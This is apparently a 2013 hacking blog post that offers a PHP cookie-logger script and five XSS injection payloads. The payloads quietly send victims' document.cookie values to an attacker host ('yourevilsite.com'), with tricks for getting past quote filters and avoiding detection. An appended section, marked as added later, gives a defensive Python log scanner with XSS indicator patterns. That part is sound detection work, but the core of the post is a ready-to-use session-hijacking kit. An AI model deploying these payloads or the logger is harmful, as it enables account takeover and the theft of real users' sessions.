Sunday, 11 August 2013

r0ng's cookie logger script - for silently stealing website cookies

For when you want to steal someone's session cookies but you don't want to raise the alarm!


Stealing cookies isn't complicated, but it can get tricky depending on what the target filters out of your JS injection. It gets much harder when your aim is to steal them silently, without the person noticing.

The script

PHP Code:
<?php
//Check if cookie file exists, if not create it
if (!file_exists("cookie.txt")) {
    file_put_contents("cookie.txt", "<h1>r0ng's cookie logger</h1>");
}

//Set cookie file variable
$file = 'cookie.txt';

//Check for password, display cookie file to admin and stop
if (isset($_GET['pass']) && $_GET['pass'] == "r0ng") {
    while (!is_readable($file)) {
        //Wait for file permissions
    }
    die("<table><tr><th>FLAG</th><th>LOCATION</th><th>IP-ADDRESS</th><th>HTTP_USER_AGENT</th><th>COOKIES</th><th>HTTP_REFERER</th></tr>" . file_get_contents($file) . "</table>");
}

//Derive victim's real ip (last entry of X-Forwarded-For if a proxy set it)
$ipAddress = $_SERVER['REMOTE_ADDR'];
if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) {
    $forwarded = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
    $ipAddress = trim(array_pop($forwarded));
}

//cURL function for geo API calls (fetches the URL and returns the body)
function get_content($URL) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $URL);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
}

//Setting data variable with victim's info in table form
$countryCode = get_content('http://api.wipmania.com/' . $ipAddress);
$data = "<tr><td><img src=http://www.geonames.org/flags/x/" . strtolower($countryCode) . ".gif width='100'></td><td>" . $countryCode . "</td><td>" . htmlspecialchars($ipAddress) . "</td><td>" . htmlspecialchars($_SERVER['HTTP_USER_AGENT']) . "</td><td>" . (isset($_GET['cookie']) ? htmlspecialchars($_GET['cookie']) : "") . "</td><td>" . (isset($_SERVER['HTTP_REFERER']) ? htmlspecialchars($_SERVER['HTTP_REFERER']) : "") . "</td></tr>";

while (!is_writable($file)) {
    //Wait for file permissions
}

//Append data to file in new line
file_put_contents($file, $data . PHP_EOL, FILE_APPEND);
?>

a.) Setting it up:
Upload that script to your webhost (logger.php).
You access the admin panel with /logger.php?pass=r0ng

b.) JS injections:

For most of the injections, we are taking advantage of the inherent stealthiness of XMLHttpRequests. The same-origin policy only stops us from reading the response from our evil site, and we don't need the response; the request itself still goes out.

1.) Quotes allowed:

<script>var a = new XMLHttpRequest(); a.open("get", "http://yourevilsite.com/logger.php?cookie=" + document.cookie); a.send();</script>

2.) Apostrophe allowed:

<script>var a = new XMLHttpRequest(); a.open('get', 'http://yourevilsite.com/logger.php?cookie=' + document.cookie); a.send();</script>

3.) Quotes/apostrophe not allowed:

Note 1: Converting the above charcode array back to string would give:

var a = new XMLHttpRequest(); a.open('get', 'http://yourevilsite.com/logger.php?cookie=' + document.cookie); a.send();

Here is a newbie-friendly site to create charcodes: http://jdstiles.com/java/cct.html

4.) Quotes/apostrophe not allowed but can reference external script:

<SCRIPT SRC=http://yourevilsite.com/evil.js></SCRIPT> 

Note 2: Any of the other injections would be placed inside the evil.js file (without the script tags).

5.) Not enough space:

<script>window.location.replace("//yourevilsite.com/logger.php?cookie=" + document.cookie)</script>

Note 3: All of these are silent other than number 5. If you need to use that one, you can add a meta-refresh redirect back to the referrer header (easily googleable if you don't know how).
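Added defender-side example, not from the original post: a small Python scanner that runs the vulnerable site's own access log through URL decoding and String.fromCharCode resolution, then flags requests carrying the patterns the five injection variants above rely on. The log lines are constructed; marking the session cookie HttpOnly keeps it out of document.cookie in the first place, and this scanner is for spotting the injection attempts after the fact.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed Apache-style access log lines (not real traffic): one clean
# request, then the quoted-XHR payload and a String.fromCharCode-obfuscated one.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Aug/2013:10:00:01 +0000] "GET /search?q=shoes HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Aug/2013:10:00:07 +0000] "GET /search?q=%3Cscript%3Evar+a%3Dnew+XMLHttpRequest()%3Ba.open(%22get%22%2C%22http%3A%2F%2Fyourevilsite.com%2Flogger.php%3Fcookie%3D%22%2Bdocument.cookie)%3Ba.send()%3B%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Aug/2013:10:00:09 +0000] "GET /search?q=%3Cscript%3Eeval(String.fromCharCode(100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C111%2C111%2C107%2C105%2C101))%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")

# Lower-cased substrings that the five injection variants rely on.
INDICATORS = ("<script", "document.cookie", "xmlhttprequest",
              "window.location", "string.fromcharcode")

def decode_charcodes(text):
    """Replace String.fromCharCode(100,111,...) with the literal it builds."""
    def build(m):
        codes = [int(n) for n in m.group(1).split(",") if n.strip()]
        return '"' + "".join(chr(c) for c in codes) + '"'
    return CHARCODE_RE.sub(build, text)

def find_indicators(path):
    """Return the indicators found in a request path after decoding it twice
    (catches double-encoding) and resolving charcode obfuscation."""
    decoded = unquote(unquote_plus(path))
    # Check both forms so the obfuscation and the string it hides are reported.
    haystack = (decoded + " " + decode_charcodes(decoded)).lower()
    return [i for i in INDICATORS if i in haystack]

def scan_log(log_text):
    """Return (client_ip, raw_path, indicators) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        found = find_indicators(m.group("path"))
        if found:
            hits.append((line.split(" ", 1)[0], m.group("path"), found))
    return hits
```

Run `scan_log(SAMPLE_LOG)` to get the two flagged requests; point it at a real log by reading the file into `log_text`.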

(If you find this useful, why not check out an advert below to support the blog? :O ) ~r0ng
